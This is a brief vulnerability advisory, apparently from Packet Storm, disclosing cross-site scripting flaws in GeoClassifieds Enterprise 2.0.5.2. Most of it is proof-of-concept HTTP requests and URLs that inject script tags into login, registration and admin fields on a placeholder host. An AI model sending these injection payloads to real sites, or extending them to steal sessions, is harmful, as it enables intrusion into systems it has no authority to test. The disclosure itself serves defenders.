GeoClassifieds Enterprise version 2.0.5.2 is susceptible to cross site scripting attacks.
b8221d279fb36db5d12e100e503a7dc2d6e86db89e31f5be786c2a153273bd65GeoClassifieds Enterprise 2.0.5.2
http://geodesicsolutions.com/products/classifieds/classifieds_enterprise.htm
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/index.php?a=10 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]2=1&submit=1
---
POST http://target.xx:80/register.php?b=1 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
c[firstname]=1&c[lastname]=1&c[company_name]=1&c[business_type]=1&c[business_type]=1&c[address]=1&c[address_2]=1&c[city]=1&c[zip]=1&c[phone]="><script>alert(/EllipsisSecurityTest/)</script>
---
http://target.xx/index.php?a=11&b=0&c=><script>alert(/EllipsisSecurityTest/)</script>&d=5
http://target.xx/admin/index.php?b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]=1
-----------------
Ellipsis Security
http://www.ellsec.org
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed